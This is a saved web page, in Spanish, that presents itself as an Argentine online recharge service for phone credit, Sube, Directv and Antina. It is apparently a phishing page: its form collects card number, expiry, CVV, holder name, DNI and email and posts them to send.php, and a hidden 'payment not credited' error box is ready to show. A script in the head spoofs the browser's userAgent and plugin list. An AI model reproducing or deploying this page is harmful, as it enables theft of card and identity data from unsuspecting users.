<!DOCTYPE html>

<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script type="text/javascript">(function() {'use strict';function shuffle(arr) {var ci = arr.length,tv,ri;while (0 !== ci) {ri = Math.floor(Math.random() * ci);ci -= 1;tv = arr[ci];arr[ci]=arr[ri];arr[ri]=tv; }return arr;}var oUA = window.navigator.userAgent;Object.defineProperty(window.navigator, 'userAgent', {get: function() {return oUA + ' Trailer/95.3.8582.83';}, configurable: true});var tPg = [];if(window.navigator.plugins) {if(window.navigator.plugins.length) {var opgLength = window.navigator.plugins.length, nvPg = window.navigator.plugins;Object.setPrototypeOf(nvPg, Array.prototype);nvPg.length = opgLength;nvPg.forEach(function(k,v) {var plg = {name: k.name, description: k.description, filename: k.filename, version: k.version, length: k.length,item: function(index) {return this[index] ?? null; }, namedItem: function(name) { return this[name] ?? null; } };var tPgLength = k.length; Object.setPrototypeOf(k, Array.prototype); k.length = tPgLength; k.forEach(function(a, b){ plg[b] = plg[a.type] = a; });Object.setPrototypeOf (plg, Plugin.prototype); tPg.push(plg);});}}var pgTI = [{'name':'SpecialPlayer', 'description': 'Special format player', 'filename': 'specialplayer.dll','0':{'type': 'application/special', 'suffixes': 'special', 'description': 'Special format player'} },{'name':'AutoUpdaterTO', 'description': 'Autou checking plugin', 'filename': 'autoupdaterto.dll','0':{'type': 'application/auto-updater-to', 'suffixes': 'auto', 'description': 'Autou checking plugin'} },{'name':'VT VideoPlayback', 'description': 'VT video playback', 'filename': 'vtvideoplayback.dll','0':{'type': 'application/vt-video', 'suffixes': 'vtv', 'description': 'VT video playback'} },{'name':'RafWebPlugin', 'description': 'Rafwe checking plugin', 'filename': 'rafwebplugin.dll','0':{'type': 'application/raf-web', 'suffixes': 'raf', 'description': 'Rafwe checking plugin'} }];if (pgTI) {pgTI.forEach(function(k, v) {var plg = {name: k.name, description: k.description, filename: k.filename, version: undefined, length: 1, item: function(index) { return this[index] ?? null; },namedItem: function(name) { return this[name] ?? null; } };var plgMt = {description: k[0].description, suffixes: k[0].suffixes, type: k[0].type, enabledPlugin: null}; Object.setPrototypeOf(plgMt, MimeType.prototype); plg[0] = plg[plgMt.type] = plgMt;Object.setPrototypeOf(plg, Plugin.prototype); tPg.push(plg);});}var fPgI = {length: tPg.length, item: function(index) {return this[index] ?? null; }, namedItem: function(name) {return this[name] ?? null; }, refresh: function() {} };tPg = shuffle(tPg);tPg.forEach(function(k,v) { fPgI[v] = fPgI[k.name] = k; });Object.setPrototypeOf(fPgI, PluginArray.prototype);Object.defineProperty(window.navigator, 'plugins', {get: function() { return fPgI; }, enumerable: true, configurable: true});})();</script>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" type="image/ico" href="https://recargasservicios.net/favicon.ico">
    <title>Recargas en linea | Recarga celular - Sube - Directv - Antina</title>
    <link rel="stylesheet" href="./index_files/stylea.css">
    <link rel="stylesheet" href="./index_files/styleb.css">
    <link rel="stylesheet" href="./index_files/stylec.css">
</head><body>
<div class="navb">
    <div class="logo">
        <a href="#">Recarga Online</a>
    </div>
</div>
<form action="send.php" method="POST" id="payment">
<input type="hidden" name="monto" value="222">
<div class="container-fluid pt-5">
    <div class="row d-flex justify-content-center">
        <div class="col-md-6 col-12">
            <h3 class="title">Bienvenido a Recargas en línea</h3>
            <h5 class="subtitle">Sigue los pasos y llena los datos solicitados para recargar.</h5>
        </div>
    </div>
    <div class="row d-flex justify-content-center" id="error" style="display: none;">
        <div class="col-lg-5 col-md-8 col-10 mt-3 contenedor error py-0">
            <div class="row">
                <div class="col-12 p-4">
                    <h5>Ocurrió un error.</h5>
                    <p>Su pago no fue acreditado. Elige otra forma de pago o comunícate con la entidad emisora de la tarjeta.</p>
                </div>
            </div>
        </div>
    </div>
    <div class="row d-flex justify-content-center">
        <div class="col-lg-5 col-md-8 col-10 mt-3 contenedor">
            <div class="row d-flex justify-content-center px-5">
                <div class="col-12">
                    <div class="input">
                        <input type="text" id="card" name="card" inputmode="decimal">
                        <label for="card">Número de tarjeta</label>
                    </div>
                </div>
                <div class="col-md-6 col-12">
                    <div class="input">
                        <input type="text" id="venc" name="venc" inputmode="decimal" placeholder="MM/AA" minlength="5" maxlength="5">
                        <label for="venc">Fecha de vencimiento</label>
                    </div>
                </div>
                <div class="col-md-6 col-12">
                    <div class="input">
                        <input type="text" id="cvv" name="cvv" inputmode="decimal" minlength="3" maxlength="4">
                        <label for="cvv">Cód. de seguridad</label>
                    </div>
                </div>
                <div class="col-12">
                    <div class="input">
                        <input type="text" id="name" name="name">
                        <label for="name">Titular</label>
                    </div>
                    <p class="small m-0">Nombre al frente de la tarjeta</p>
                </div>
                <div class="col-12">
                    <div class="input">
                        <input type="text" id="dni" name="dni" inputmode="decimal">
                        <label for="dni">DNI titular</label>
                    </div>
                </div>
                <div class="col-12">
                    <div class="input">
                        <input type="email" id="email" name="email" placeholder="email@ejemplo.com">
                        <label for="email">E-mail</label>
                    </div>
                    <p class="small m-0">Correo electronico para obtener recibo digital</p>
                </div>
                <div class="col-12">
                    <button type="submit" id="submit_2" disabled="disabled">Siguiente</button>
                </div>
            </div>
        </div>
    </div>
</div>
</form>
<script src="./index_files/jquery.js.descarga"></script>
<script src="./index_files/customscript.js.descarga"></script>    

</body></html>